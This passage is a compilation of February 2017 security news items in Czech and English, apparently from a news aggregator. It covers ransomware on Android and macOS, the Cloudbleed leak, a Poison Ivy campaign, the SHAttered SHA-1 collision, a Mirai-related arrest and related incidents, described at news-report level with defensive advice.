Vše tedy nasvědčuje tomu, že v letošním roce se budou vyděračské viry šířit ještě více, než tomu bylo v tom loňském.
Útoky jsou sofistikovanější
Sluší se navíc připomenout, že v šíření podobných nezvaných návštěvníků jsou kyberzločinci stále vynalézavější. Mnohdy případný útok nemusí odhalit ani zkušení uživatelé.
Jedním z nejnovějších triků je zobrazování webových stránek s nesmyslnými znaky. S podobnými, jaké se zobrazují například v textových dokumentech, pokud v počítači není nainstalovaný použitý font písem. Uživatel tak musí v praxi znakovou sadu manuálně doinstalovat, aby si mohl text přečíst.
A přesně na to sázejí počítačoví piráti. „Uživateli je zobrazena výzva k instalaci balíčku fontů pro Google Chrome s tím, že tím bude problém vyřešen,“ konstatoval Pavel Bašta, bezpečnostní analytik CSIRT.CZ.
„Pokud uživatel na trik skočí, problémy mu teprve začnou, neboť si místo fontů nainstaluje do svého počítače trojského koně, nebo dokonce ransomware,“ doplnil bezpečnostní analytik s tím, že s podobnými útoky se mohou uživatelé setkat i na legitimních webových stránkách, které se podaří počítačovým pirátům napadnout.
Výkupné neplatit
Útoky vyděračských virů jsou vždy na chlup stejné. Nejprve tito záškodníci zašifrují všechna data uložená na pevném disku. Za jejich zpřístupnění pak útočníci požadují výkupné, a to klidně i několik tisíc korun.
Kyberzločinci se zpravidla snaží v majiteli napadeného stroje vzbudit dojem, že se ke svým souborům dostane po zaplacení pokuty.
Sluší se připomenout, že výkupné by ale lidé neměli platit, protože nemají žádné záruky, že data budou skutečně zpřístupněna. Z podobných případů, které se objevovaly v minulosti, dokonce vyplývá, že nedochází k odšifrování dat prakticky nikdy. Jediným řešením je počítač odvirovat, což však nemusí být jednoduché.
Nejbizarnější virus pro Android? Falešný Avast obalený falešným PornHubem, za který zaplatíte 100 dolarů
24.2.2017 Novinky/Bezpečnost Viry
Autorům ransomwaru pro Android se nedá upřít jedna věc
Mají zvrácený smysl pro humor
Vydávají se za Avast, FBI nebo třeba NSA
Autorům ransomwaru – nebezpečného malwaru, který zašifruje data a žádá výkupné – nelze upřít jednu věc: Smysl pro humor, i když poněkud zvrácený. Vyplývá to alespoň z bezpečnostní studie Trends in Android Ransomware (PDF), kterou připravili analytici z Esetu a která se tentokrát věnuje vyděračským virům, jenž se v minulosti šířily a mnohé i nadále šíří světem Androidu.
Aby měl ransomware čas zašifrovat přinejmenším veřejnou paměť na telefonu (SD kartu, sdílené vnitřní úložiště aj.), často se vydává za vcelku legitimní program. A než si leckdo všimne něčeho podezřelého, už může být pozdě.
Některé takové exempláře, které zachytili v Esetu, si však opravdu zaslouží pozornost. Jedním z nich je falešný antivirus označovaný jako Android/FakeAV.E. To samo o sobě není nic neobvyklého, protože v této podobě se začal šířit nejeden malware i na klasickém desktopu. Zdánlivě důvěryhodná aplikace, kterou jste dobrovolně spustili, pak ve skutečnosti natahala do počítače další malware, anebo začala šifrovat jeho pevný disk.
Falešný Avast obalený falešným PornHubem
Jeden takový mobilní antivirus je však trošku jiný, je totiž obalen ještě další fiktivní aplikací – PornHubem. Portál pro fanoušky nezávislé kinematografie asi netřeba příliš představovat. A proč si jej záškodníci vybrali? Nejen pro jeho věhlas, ale především proto, že Play Store neumožňuje publikaci pornografických aplikací, a tak i PornHub distribuuje aplikaci samostatně jako APK balíček, který musíte instalovat ručně. Tím pádem neprojde antivirovou kontrolou na straně Googlu a běžný uživatel zároveň povolí instalaci aplikací z alternativních zdrojů, čehož mohou využít další viry.
Skutečný a falešný PornHub s Avastem
V každém případě, jakmile aplikaci spustíte, zobrazí se sice základní obrazovka PornHubu, ihned poté ale i výzva ke kontrole virů. No a pak už to jde ráz naráz. Falešný antivirus Avast samozřejmě dle zadání autora vypíše bohatý seznam malwaru, které údajně našel, ve skutečnosti však sám zaviroval paměť, načež zobrazí drzý dialog, že z bezpečnostních důvodů raději vše zablokoval a vy si musíte koupit verzi Pro – tedy zaplatit výkupné 100 dolarů… Skrze bitcoin.
Falešná policie, FBI a NSA
Další zajímavou kamufláží nejednoho ransomwaru jsou bezpečnostní složky – zejména policie. Ta má přeci všude na světě respekt, takže se každý zalekne a raději zaplatí. Některé podvodné aplikace, které zašifrují data a žádají výkupné, tak sází na to, že po spuštění zobrazí dialog s informací, že na mobilu našly nějaký ten ilegální obsah – typicky warez, a podle paragrafu XYZ vám hrozí pokuta a trest odnětí svobody, čemuž se vyhnete pouze v případě, že zaplatíte malý správní poplatek... Skrze bitcoin.
Falešná ruská policie si pořídí i váš snímek, zatímco FBI a NSA jdou rovnou na věc a chtějí zaplatit pokutu, jinak budete vydáni do USA
Ochrana před podobným smetím na telefonu je přitom již roky stejná a vlastně docela jednoduchá. V prvé řadě stačí používat selský rozum a instalovat pouze aplikace s dobrým hodnocením, přes veškerou snahu Googlu totiž není zcela bezpečný ani jeho Play Store a čas od času přes jeho antivirové kontroly přeci jen něco proklouzne.
Hacker Shows How Easy It Is To Hack People While Walking Around in Public
24.2.2017 thehackernews Hacking
Wi-Fi enabled devices — widely known as the Internet of Things (IoT) — are populating offices and homes in greater and greater numbers.
From smartphones to connected printers and even coffee makers, most of these IoT devices have good intentions and can connect to your company's network without a problem.
However, as the Internet of Things (IoT) devices are growing at a great pace, they continue to widen the attack surface at the same time, giving attackers a large number of entry points to affect you some or the other way.
The attackers can use your smart devices to gain backdoor entry to your network, giving them the capability to steal sensitive data, such as your personal information, along with a multitude of other malicious acts.
An interesting attack scenario has recently been demonstrated by one of the renowned hackers, Jayson Street, who said all it is needed is to walk around with the right device to get into someone's device.
Before we jump into the technical details of the attack, let's watch out a video showing that how easy it is to hack smartphones and laptops in a crowded place by setting up an EvilAP (malicious access point).
Here's How the Attack Works:
Hacker Shows How Easy It Is To Hack People While Walking Around in Public
Street used a simple penetration testing device and an internet connection to pwn people around him.
Technically, Street hacking device automatically set up an 'Evil Twin Attack,' in which an attacker fools wireless users into connecting their smartphones and laptops to an evil (malicious) hotspot by posing as a legitimate WiFi provider.
Once connected, all of the victim's information flows directly into the attacker's device, allowing cybercriminals to secretly eavesdrop on the network traffic and steal passwords, financial and other sensitive data and even redirect you to malware and phishing sites.
How to Prevent Evil Twin WiFi Attacks
Pwnie Express released its yearly industry report: Internet of Evil Things, providing insight on products that the IT professionals should be wary of.
Using the report and additional information from security researchers at Pwnie, we have listed five quick steps you can implement in order to prevent yourself or your workplace from being compromised.
1. Turn your WiFi Off: Turn off Wi-Fi devices when you are not using them, especially on the weekends — it saves energy and minimizes your exposure to hackers.
2. Use it or Lose it: Once the product is in your office, turn off the functions you aren't using. Enabled functionality usually comes with increased security risks.
Also, make sure you review the products before you bring them into the workplace. If it is already there, do not be shy about calling customer service and walking through the steps required to shut down any unused functions.
3. Change Your Passwords: It is important never to use the default credentials. Set up strong, secure passwords to secure your devices.
4. Research Your Purchase: Before you even buy a product, always research what you're buying and make sure you know how to update any software associated with that device.
Look for devices, systems, and services that make it easy to upgrade the device and inform the end user when updates are available.
5. Trust and Verify Every Device: Be aware of any device from brands known to have more security issues than others. The personalization of corporate hardware, including mobile hotspot vendors, is one of the top threats to network security.
Serious Bug Exposes Sensitive Data From Millions Sites Sitting Behind CloudFlare
24.2.2017 thehackernews Vulnerebility
A severe security vulnerability has been discovered in the CloudFlare content delivery network that has caused big-name websites to expose private session keys and other sensitive data.
CloudFlare, a content delivery network (CDN) and web security provider that helps optimize safety and performance of over 5.5 Million websites on the Internet, is warning its customers of the critical bug that could have exposed a range of sensitive information, including passwords, and cookies and tokens used to authenticate users.
Dubbed Cloudbleed, the nasty flaw is named after the Heartbleed bug that was discovered in 2014, but believed to be worse than Heartbleed.
The vulnerability is so severe that it not only affects websites on the CloudFlare network but affects mobile apps as well.
What exactly is "Cloudbleed," how it works, how are you affected by this bug, and how you can protect yourself? Let's figure it out.
What is Cloudbleed?
Discovered by Google Project Zero security researcher Tavis Ormandy over a week ago, Cloudbleed is a major flaw in the Cloudflare Internet infrastructure service that causes the leakage of private session keys and other sensitive information across websites hosted behind Cloudflare.
CloudFlare acts as a proxy between the user and web server, which caches content for websites that sits behind its global network and lowers the number of requests to the original host server by parsing content through Cloudflare’s edge servers for optimization and security.
Almost a week ago, Ormandy discovered a buffer overflow issue with Cloudflare's edge servers that were running past the end of a buffer and were returning memory containing private data like HTTP cookies, authentication tokens, and HTTP POST bodies, with some of the leaked data already cached by search engines.
Here's How Serious is Cloudbleed:
"I'm finding private messages from major dating sites, full messages from a well-known chat service, online password manager data, frames from adult video sites, hotel bookings," Ormandy wrote in a blog post that was also published Thursday. "We're talking full HTTPS requests, client IP addresses, full responses, cookies, passwords, keys, data, everything."
According to Ormandy, Cloudflare had code in its "ScrapeShield" feature that did something similar to this:
int Length = ObfuscateEmailAddressesInHtml(&OutputBuffer, CachedPage);
write(fd, OutputBuffer, Length);
But the company was not checking if the obfuscation parsers returned a negative value because of malicious HTML.
The Cloudflare's "ScrapeShield" feature parses and obfuscates HTML, but since reverse proxies are shared among customers, it would affect all CloudFlare customers.
Ormandy contacted Cloudflare and reported it about his findings. The company identified the cause of the issue, and immediately disabled 3 minor Cloudflare features — Email obfuscation, Server-side Excludes, as well as Automatic HTTPS Rewrites — that were using the same HTML parser chain, which was causing the leakage.
Ormandy observed encryption keys, passwords, cookies, chunks of POST data, and HTTPS requests for the other leading Cloudflare-hosted websites from other users and immediately contacted Cloudflare.
Since CloudFlare patched the issue but did not notify customers by Wednesday of the data leak issue, Ormandy made public his findings on Thursday, following Project Zero's seven-day policy for actively exploited attacks.
Following Ormandy's public disclosure of the vulnerability on Thursday, CloudFlare confirmed the flaw, ensuring its customers that their SSL private keys were not leaked.
"Cloudflare has always terminated SSL connections through an isolated instance of NGINX that was not affected by this bug," Cloudflare CTO John Graham-Cumming wrote in a blog post. "The bug was serious because the leaked memory could contain private information and because it had been cached by search engines."
"We are disclosing this problem now as we are satisfied that search engine caches have now been cleared of sensitive information," he added. "We have also not discovered any evidence of malicious exploits of the bug or other reports of its existence."
The Root Cause of Cloudbleed:
The root cause of the Cloudbleed vulnerability was that "reaching the end of a buffer was checked using the equality operator and a pointer was able to step past the end of the buffer."
"Had the check been done using >= instead of == jumping over the buffer end would have been caught," said Cumming.
Cloudflare has also confirmed that the greatest period of impact was between February 13 and February 18 with almost one in every 3,300,000 HTTP requests via Cloudflare potentially resulting in memory leakage, which is about 0.00003% of requests.
However, the researcher argued that the DNS provider was double-dealing, claiming that the Cloudbleed vulnerability had existed for months, based on Google's cached data.
How Does Cloudbleed Affect You?
There are a large number of Cloudflare's services and websites that use parsing HTML pages and modify them through the Cloudflare's edge servers.
Even if you do not use CloudFlare directly, that does not mean that you are spared. There is always a chance that websites you visit and web services you use may have been affected, leaking your data as well.
Of course, if you are using Cloudflare services in front of your site, the flaw could impact you, exposing sensitive information that flowed between your servers and end-users through CloudFlare's proxies.
While CloudFlare's service was rapidly patched the bug and has said the actual impact is relatively minor, data was leaking constantly before this — for months.
Some of this leaked data were publicly cached in search engines such as Google, Bing, Yahoo, who now removed it, but some engines like DuckDuckGo still host those data.
Also, other leaked data might exist in other services and caches throughout the Web, which is impossible to delete across all of these locations.
Cloudbleed Also Affects Mobile Apps
Cloudbleed also affects mobile apps, because, in many cases, the apps are designed to make use of the same backends as browsers for content delivery and HTTPS (SSL/TLS) termination.
Users on YCombinator have confirmed the presence of HTTP header data for apps like Discord, FitBit, and Uber by searching through DuckDuckGo caches with targeted search terms.
In an analysis conducted by NowSecure, the researchers have discovered some 200 iOS apps that identified as using Cloudflare services from a sampling of some 3,500 of the most popular apps on the app store.
There is always a possibility of someone discovering this vulnerability before Tavis, and may have been actively exploiting it, although there is no evidence to support this theory.
Some of the Cloudflare's major customers affected by the vulnerability included Uber, 1Password, FitBit, and OKCupid. However, in a blog post published by 1Password, the company assured its users that no sensitive data was exposed because the service was encrypted in transit.
However, a list of websites that have potentially been impacted by this bug has been published by a user, who go by the name of 'pirate,' on GitHub, which also included CoinBase, 4Chan, BitPay, DigitalOcean, Medium, ProductHunt, Transferwise, The Pirate Bay, Extra Torrent, BitDefender, Pastebin, Zoho, Feedly, Ashley Madison, Bleeping Computer, The Register, and many more.
Since CloudFlare does not yet provide the list of affected services, bear in mind that this is not a comprehensive list.
What should You do about the Cloudbleed bug?
Online users are strongly recommended to reset their passwords for all accounts in case you have reused the same passwords on every site, as well as monitor account activity closely as cleanup is underway.
Moreover, customers who are using Cloudflare for their websites are advised to force a password change for all of their users.
Update: Uber representative reached out to me via an email and said their investigation revealed that the CloudBleed bug exposed no passwords of their customers. Here's the statement provided by Uber:
"Very little Uber traffic actually goes through Cloudflare, so only a handful of tokens were involved and have since been changed. Passwords were not exposed."
South Korea targeted by a cyber espionage campaign, experts blame Norks
24.2.2017 securityaffairs Cyber
South Korea is once against under attack, alleged nation-state hackers have launched a sophisticated cyber espionage campaign on organizations in the public sector.
According to the experts at Cisco Talos, the cyber espionage campaign was active between November 2016 and January 2017 and leveraged on vulnerabilities in a Korean language word processing program (Hangul Word Processor document (HWP)) and a spoofed document from the Korean Ministry of Unification.
The cyber espionage campaign was conducted simultaneously ballistic missile tests conducted by North Korea in early February and shortly before the announced a joint military exercise organized by the United States and South Korea.
Malware researchers who investigated the cyber attacks discovered that the threat actors used a compromised Korean government website (kgls.or.kr (Korean Government Legal Service)) to download secondary payloads onto compromised machines.
The file downloaded is a binary masquerading as a jpeg image file that is then executed as part of the infection.
The experts noticed that the hackers used a proprietary format of the Hangul Word Processor, which is a local word processor, a circumstance that suggests the involvement of well-funded group interested in hacking South Korean targets, especially Government offices.
Hackers used a bait document titled “Analysis of “Northern New Year” in 2017,” it includes a logo of the Ministry Of Unification at the bottom of the document.
“This is a fairly unusual choice as this software is rarely used outside of Korea, but it is known to be widely used within Korea, including use by the South Korean government. As a regional file format, many security devices are not equipped to process HWP files. This can allow an attacker a vector with a much lower risk of detection by any security scanning devices.” reads the analysis shared by the Talos Group.
The documents were used to drop malware files with different hash but with the same purpose:
Open a HWP document (to respond to the double click in the previous document)
Download a payload from a compromised host/C2.
The experts at Talos were able to the Command and Control infrastructure used by the hackers, four servers that were based in the following countries:
3 C2 in South Korea
1 C2 in the Netherlands
Investigators believe the attack was backed by North Korea, the TTPs (Techniques, tactics, and procedures) match the profile of campaigns previously associated with nation-state actors. North Korea is the main suspect, but in the past also the US NSA compromised computer networks in South Korea, primarily to spy on the government of Pyongyang.
North Korea has launched numerous cyber attacks against the South across the years, the Dark Seoul is probably one of the most popular hacking campaigns that targeted banks and broadcasters in 2013.
In the past other attacks leveraged on flaws in the Hangul Word Processor, in September 2015 security experts from FireEye speculated that the North Korea carried out the cyber attacks against the South Korea by exploiting a zero-day ( CVE-2015-6585) in the word processing program widely used in that country.
According to a report published by FireEye, the Hangul Word Processor is a proprietary software primarily used by government and public institutions in the South Korea, for this reason, the North Korea allegedly exploited it the attack vector.
Back to the present, let me suggest to read the report, it also includes IoCs.
Cloudbleed flaw exposes sensitive data from millions sites behind CloudFlare
24.2.2017 securityaffairs Hacking
Cloudflare was leaking a wide range of sensitive information, including authentication cookies and login credentials, the flaw was dubbed Cloudbleed.
The notorious Google security researcher, Tavis Ormandy, recently made and astonishing discovery, Cloudflare was leaking a wide range of sensitive information, including authentication cookies and login credentials, the flaw was dubbed Cloudbleed.
“On February 17th 2017, I was working on a corpus distillation project, when I encountered some data that didn’t match what I had been expecting. It’s not unusual to find garbage, corrupt data, mislabeled data or just crazy non-conforming data…but the format of the data this time was confusing enough that I spent some time trying to debug what had gone wrong, wondering if it was a bug in my code. In fact, the data was bizarre enough that some colleagues around the Project Zero office even got intrigued.” Ormandy wrote in a security advisory. “We fetched a few live samples, and we observed encryption keys, cookies, passwords, chunks of POST data and even HTTPS requests for other major cloudflare-hosted sites from other users. Once we understood what we were seeing and the implications, we immediately stopped and contacted cloudflare security.”
Follow
Tavis Ormandy @taviso
Cloudflare have been leaking customer HTTPS sessions for months. Uber, 1Password, FitBit, OKCupid, etc. https://bugs.chromium.org/p/project-zero/issues/detail?id=1139 …
12:00 AM - 24 Feb 2017
4,216 4,216 Retweets 2,444 2,444 likes
The Cloudbleed security issue in Cloudflare servers has a significant impact on numerous major organizations, including Uber, Fitbit, 1Password, and OKCupid. Cloudbleed also affects mobile apps, because, they are developed using the same backends as browsers for content delivery and HTTPS (SSL/TLS) termination.
“Last Friday, Tavis Ormandy from Google’s Project Zero contacted Cloudflare to report a security problem with our edge servers. He was seeing corrupted web pages being returned by some HTTP requests run through Cloudflare.” reads a blog post published by Cloudflare’s CTO, John Graham-Cumming
“It turned out that in some unusual circumstances, which I’ll detail below, our edge servers were running past the end of a buffer and returning memory that contained private information such as HTTP cookies, authentication tokens, HTTP POST bodies, and other sensitive data. And some of that data had been cached by search engines.”
Google has started removing cached copies of the leaked data, unfortunately, the same information is still stored in the servers of many other search engines that are accessible to everyone.
Cloudflare promptly responded to the incident, the company disabled the following features on its infrastructure because they leverage the broken HTML parser chain that is the root cause of the issue:
Email obfuscation;
Server-side Excludes;
Automatic HTTPS Rewrites;
The root cause of Cloudbleed was that “reaching the end of a buffer was checked using the equality operator and a pointer was able to step past the end of the buffer.” “Had the check been done using >= instead of == jumping over the buffer end would have been caught,” explained Cumming.
The Cloudbleed issue dates back September 22, 2016, when the problem begun for the company. The greatest period of impact was between February 13 and February 18 with almost one in every 3,300,000 HTTP requests via Cloudflare potentially resulting in memory leakage, (roughly 0.00003% of requests).
“The bug was serious because the leaked memory could contain private information and because it had been cached by search engines. We have also not discovered any evidence of malicious exploits of the bug or other reports of its existence.” continues the post published by Cloudflare. “The greatest period of impact was from February 13 and February 18 with around 1 in every 3,300,000 HTTP requests through Cloudflare potentially resulting in memory leakage (that’s about 0.00003% of requests).”
It is very curious the fact that Cloudflare pointed Ormandy to the company bug bounty programme, offering the expert a reward of a t-shirt instead of financial compensation.
We cannot exclude that a threat actor discovering the Cloudbleed flaw may have been actively exploiting it, but at the time I was writing there is no evidence of such kind of attacks.
New "Filecoder" macOS Ransomware Surfaces
24.2.2017 securityweek Virus
New Filecoder macOS Ransomware is Poorly Coded, Destructive
A newly discovered ransomware targeting macOS destroys encryption keys before sending them to its apparently inexperienced developer, ESET researchers have discovered.
Dubbed Filecoder (OSX/Filecoder.E) and written in Apple's Swift programming language, the threat is only the second ransomware family known to have ever hit macOS. The first fully functional such threat emerged in March last year as KeRanger, and was soon found to be a variant of the Linux ransomware known as Linux.Encoder.
Although file-encrypting ransomware targeting macOS is so rare, it can be really damaging, and OSX/Filecoder.E proves that fully. The malware is distributed via BitTorrent distribution sites masquerading as an application for pirating popular software such as Adobe Premiere Pro and Microsoft Office for Mac, ESET’s Marc-Etienne M.Léveillé explains.
The application, which has the bundle identifier NULL.prova, hasn’t been signed with a certificate issued by Apple, making its installation more difficult on newer operating system versions, where default security settings would prevent it from running. What’s more, the malicious app’s window has a transparent background that makes it confusing, and can’t be opened once closed.
Once the user runs the malicious program, it first copies a README!.txt file in user’s folders, then starts encrypting the files it finds on the machine. For that, it enumerates user’s files with the find command line tool, then uses a randomly generated 25-character string to encrypt all of the discovered files by placing each of them in an encrypted archive.
The malware also deletes the original files with rm, and modifies the encrypted files’ time to midnight, February 13th 2010, using the touch command. After encrypting files in the /Users directory, the malware starts searching for mounted external and network storage under /Volumes and repeats the process for files on them as well.
As soon as the process has been completed, the ransomware is supposed to null all free space on the root partition with diskutil, but the operation fails because the developer didn’t use the correct path to the tool in the malware’s code, M.Léveillé notes. While Filecoder.E tries to execute /usr/bin/diskutil, the actual path to the tool in macOS is /usr/sbin/diskutil.
The dropped README!.txt file functions as a ransom note, providing victims with instructions on how to pay to recover their files. Apparently, the malware uses the same Bitcoin address and email address for every victim running the same sample. However, the security researchers noticed that no payment was made until now, and say that no one tried to contact the malware developer via the provided email address (a public inbox that can be accessed without registering or authentication).
The main issue with the ransomware, researchers say, is that it doesn’t attempt to connect to a command and control server to transmit the encryption key before destroying it, meaning that the malware author can’t decrypt users’ files even after receiving payment. Furthermore, the key is generated using a secure algorithm and is too long to be brute forced.
“This also means that there is no way for them to provide a way to decrypt a victim’s files. Paying the ransom in this case will not bring you back your files. That’s one of the reasons we advise that victims never pay the ransom when hit by ransomware. Alas, the random ZIP password is generated with arc4random_uniform which is considered a secure random number generator. The key is also too long to brute force in a reasonable amount of time,” M.Léveillé explains.
Although not a masterpiece, the new macOS-targeting crypto-ransomware is effective enough to prevent the victims from accessing their files, and researchers say it could cause serious damage. The malware also proves that users downloading pirated software are exposed to greater risks, especially when using dubious channels for acquiring software. Users are advised to download software only from official websites, to keep their software up to date at all times, and to install and maintain a security application on their machines.
Poison Ivy RAT Campaign Leverages New Delivery Techniques
24.2.2017 securityweek Virus
A recently observed campaign using the Poison Ivy remote access tool (RAT) against individuals within the Mongolian government uses publicly available techniques that haven’t been observed in previous campaigns, FireEye reports.
The Poison Ivy backdoor has been around for several years, targeting organizations all around the world, and was associated with a China-linked threat actor known as menuPass, Stone Panda and APT10. The malware packs capabilities such as key logging, screen and video capture, file transfers, password theft, system administration, traffic relaying, and more.
FireEye didn’t attribute the new campaign to a specific actor, and told SecurityWeek in an email that it can’t make direct connections to a particular group at this time. The security firm said it lacks visibility into what the actors did and admitted it doesn’t know if they were successful. Still, the company did say that “espionage is a reasonable assumption for their motives.”
What the newly observed campaign did show, however, was that the actor behind it is up-to-date with recent social engineering and evasion techniques and isn’t shy when it comes to using them. The attacks leveraged an AppLocker bypass that was publicly revealed last year, as well as fileless execution and persistence, and benign documents to minimize user suspicion of malicious activity.
The malware was distributed via Word documents with malicious macros, and the threat actor was using social engineering to trick users into enabling these macros. The malicious documents were delivered via email, claiming to contain instructions for logging into webmail or information regarding a state law proposal, FireEye explains.
The malicious macros in the documents were designed to invoke Regsvr32, a command-line utility designed for registering DLLs in the registry, to download a Windows Script Component file (SCT file) by passing the URL of the SCT file as an argument. This technique was demonstrated last year to effectively bypass AppLocker, the Microsoft application whitelisting solution that prevents unknown executables from running on a system.
In this campaign, the malicious SCT file was designed to invoke WScript to launch PowerShell in hidden mode with an encoded command, FireEye reports. After the PowerShell command is decoded, another layer of PowerShell instructions emerges, serving two purposes: to download a decoy document from the Internet and open it in a second winword.exe process using the Start-Process cmdlet; and to download and run another PowerShell script named f0921.ps1.
The third stage PowerShell script configures an encoded command persistently as base64 string in the HKCU: \Console\FontSecurity registry key, along with an HKCU\CurrentVersion\Run\SecurityUpdate value to launch the encoded PowerShell payload stored in the previously configured key. Thus, the PowerShell payload is executed every time the user logs in to the system.
A fourth stage PowerShell script in the HKCU\Console\FontSecurity registry borrows from the publicly available Inject-LocalShellCode script from PowerSploit to inject shellcode, researchers explain. The shellcode has a custom XOR-based decryption loop that uses a single byte key (0xD4), and was designed to inject the Poison Ivy backdoor into userinit.exe. The decrypted shellcode also revealed content and configuration related to Poison Ivy.
“Although Poison Ivy has been a proven threat for some time, the delivery mechanism for this backdoor uses recent publicly available techniques that differ from previously observed campaigns. Through the use of PowerShell and publicly available security control bypasses and scripts, most steps in the attack are performed exclusively in memory and leave few forensic artifacts on a compromised host,” FireEye says.
Out-of-band resource load in Google allows attacker to launch a DDoS attack from its servers
24.2.2017 securityaffairs Attack
A security researcher discovered an Out-of-band resource load flaw in Google’s servers that allowed him to perform a DDoS attack on remote hosts.
Young security researcher, Luka Sikic from Croatia found a serious vulnerability in Google. He was able to servers of the IT giant to perform a DDoS attack on remote hosts.
Out-of-band resource load (classified by PortSwigger) is original name for this type of vulnerability which allows attackers to use vulnerable servers (in this case Google’s) to perform DoS / DDoS attack on a remote host. Basically, the attacker would send a big number of requests to vulnerable web application containing target host as payload, then the vulnerable web application will reflect every request to target address, defined by the attacker. PortSwigger rated this issue severity as high level.
During exploitation test, Sikic was able to gain over 700 Mbps traffic after 10,000 requests.
However, Google has a caching system which is there to prevent this type of issue. Sikic was able to bypass that security measure and let server think that every request is unique.
In his demonstration video, we can see that traffic goes around 300 Mbps, depending on the number of requests per second.
As a mitigation measure for this issue, there should be a better caching mechanism and a detecting system which would not allow an unlimited number of requests to a remote host.
We found that this is not the first time Sikic found a vulnerability in Google’s products. Few months before, he found and reported Cross-site Scripting in YouTube, and Big G received reports about these this issue, and Sikic is already listed in Google’s “Hall of fame” list.
This 17 years old researcher is already certified by Offensive Security and obtained his OSCP certification.
Timeline for the Out-of-band resource load is:
February 18 – Bug Reported
February 19 – More information sent
February 20 – Report Triaged
February 22 – Security Issue Confirmed
February 22 – Google update: Issue is already known to Google
UK police arrested the alleged mastermind of the MIRAI attack on Deutsche Telekom
24.2.2017 securityaffairs BotNet
The prosecutor’s office in Cologne and the Federal Criminal Police Office have arrested the alleged mastermind of the MIRAI attack on Deutsche Telekom
The agents at the UK National Crime Agency (NCA) have a man that is suspected to be involved with the massive attack on Deutsche Telekom that affected more than 900k routers in November 2016.
The affected routers were used by the Deutsche Telekom customers also for fixed telephony and TV services.
The problems lasted at least two days, the outage began on Sunday, November 27, at around 17:00, local time.
Deutsche Telekom users all over the country were not able to connect online using the users provided by the company. Below a graphic representation of the outage provided by the Allestoerungen.de.
The news of the arrest was confirmed by the Germany’s federal criminal police force (BKA).
German police from the city of Cologne identified the suspect and issued the international arrest warrant.
The suspect is a 29-year-old British, the authorities have arrested him at the Luton airport in London on Wednesday. The British police believe the man is the crooks that organized the massive attack.
The German police confirmed that the attack was severe and caused serious problems to German citizens. The attackers aimed to recruit the compromised devices in a botnet that was offered for sale on dark web markets.
“The aim of the attack wave should have been to take over the routers and integrate into a bot network operated by the accused. The bot network is supposed to have offered the accused in the Darknet for consideration for arbitrary attack scenarios, such as so-called DDoS attacks.” reads the statement issued by the BKA.
“From the outset, Deutsche Telekom cooperated with law enforcement agencies,” BKA said. “Technical assistance was also provided by the Federal Office for Information Security (BSI) in the analysis of the malicious software used.”
The prosecutors believe the hacker used a modified version of the dreaded Mirai malware to carry on the attack.
The Mirai malware was first spotted by the researcher MalwareMustDie last summer, a botnet of IoT devices compromised by the malicious code was used to shut down the Dyn DNS service.
The BKA confirmed that the UK authorities would extradite the 29-year-old man to Germany to face charges of computer sabotage, the man could be condemned to up to 10 years in prison.
SHAttered attack, Google and CWI conducted the first SHA-1 collision attack
24.2.2017 securityaffairs Attack
Experts at Google and CWI conducted the first real world collision attack against popular SHA-1 hashing algorithm, so called shattered-attack.
Researchers at Google and Centrum Wiskunde & Informatica (CWI) in the Netherlands succeeded in conducting the first real world collision attack against popular SHA-1 hashing algorithm.
The researchers created two documents with different content but having the same SHA-1 hashes.
Google and CWI devised a hacking method dubbed ‘SHA-1 shattered’ or ‘SHAttered.’
“We were able to find this collision by combining many special cryptanalytic techniques in complex ways and improving upon previous work. In total the computational effort spent is equivalent to 2 63.1 SHA-1 compressions and took approximately 6 500 CPU years and 100 GPU years,” experts wrote in the research paper.
The SHA-1 algorithm was designed in 1995 by the National Security Agency (NSA) as a part of the Digital Signature Algorithm, as we have already explained in the past hashing functions converts any input message to a string of numbers and letters of fixed length. This string is theoretically unique and is normally used as a cryptographic fingerprint for that message.
If two different messages generate the same digest we are in the presence of a collision, this circumstance opens the door to hackers. A successful collision attack could be exploited by hackers to forge digital signatures.
In 2015 a group of researchers demonstrated that the cost of breaking the SHA-1 hash algorithm is lower than previously estimated.
The experts evaluated the economic effort requested to break the SHA1-1, experts in a range from $75,000 and $120,000 using Amazon’s EC2 cloud over a period of a few months.
According to the experts, the SHAttered attack is 100,000 times faster than a brute-force attack, it required nine quintillion (9,223,372,036,854,775,808) computations.
The SHAttered attack was composed of two phases:
the first phase of the attack was run on a heterogeneous CPU cluster hosted by Google and spread across eight physical locations.
the second phase of the attack was run on a heterogeneous cluster of K20, K40 and K80 GPUs hosted by Google.
The monetary cost of computing the second block of the attack by renting Amazon instances can be estimated from these various data. According to the experts, it would cost roughly $560,000 for the necessary 71 device years. It would be more economical for a patient attacker to wait for low “spot prices.”
The experts used two PDF files with different content for their PoC, the two documents had the same SHA-1 hash.
The researchers will release the code of the attack after 90 days.
The experts released a free online tool that scans for SHA-1 collisions in documents, it is available on the shattered.io website. Google has already introduction mitigation solutions in both Gmail and Google Drive services.
I suggest you give a look at this interesting infographic on the SHAttered attack.
Falešné nabídky už neletí. Podvodníci zkoušejí zcela nový trik
23.2.2017 Novinky/Bezpečnost Hacking
V loňském roce se na internetu doslova roztrhl pytel s falešnými nabídkami na slevy a výhodné akce. Kyberzločinci se tak často vydávali za obchodníky nebo zástupce nějaké finanční společnosti a z důvěřivců lákali přihlašovací údaje či se jim snažili infikovat počítač škodlivým virem. Letos však přišli s daleko sofistikovanějším podvodem. Uživateli zobrazí jen roztodivné klikyháky.
Před novým trikem varoval Národní bezpečnostní tým CSIRT.CZ, který je provozován sdružením CZ.NIC.
„Byl zaznamenán nový trik, jak donutit uživatele k instalaci malwaru. V tomto případě je malware distribuován s pomocí webových stránek, na kterých se zobrazují nesmyslné znaky,“ uvedl Pavel Bašta, bezpečnostní analytik CSIRT.CZ.
Podobné znaky se často zobrazují například v textových dokumentech, pokud v počítači není nainstalovaný použitý font písem. Uživatel tak musí v praxi znakovou sadu manuálně doinstalovat, aby si mohl text přečíst.
Místo nového fontu virus
A přesně na to sázejí počítačoví piráti. „Uživateli je zobrazena výzva k instalaci balíčku fontů pro Google Chrome s tím, že tím bude problém vyřešen,“ konstatoval Bašta.
„Pokud uživatel na trik skočí, problémy mu teprve začnou, neboť si místo fontů nainstaluje do svého počítače trojského koně, nebo dokonce ransomware Spora,“ doplnil bezpečnostní analytik s tím, že s podobnými útoky se mohou uživatelé setkat i na legitimních webových stránkách, které se podaří počítačovým pirátům napadnout.
Chtějí výkupné
Ransomware je souhrnné označení vyděračských virů, které dělají bezpečnostním expertům vrásky na čele již několik posledních měsíců. Útoky těchto nezvaných návštěvníků probíhají vždy na chlup přesně.
